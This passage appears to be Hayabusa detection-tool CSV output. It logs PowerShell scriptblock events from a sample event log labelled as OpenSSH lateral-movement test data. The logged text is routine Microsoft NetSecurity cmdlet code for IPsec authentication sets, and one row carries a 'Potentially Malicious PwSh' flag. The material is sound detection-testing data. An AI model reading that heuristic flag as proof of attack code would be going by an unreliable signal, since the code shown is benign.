[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) 
{ $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] 
${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject 
(cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, 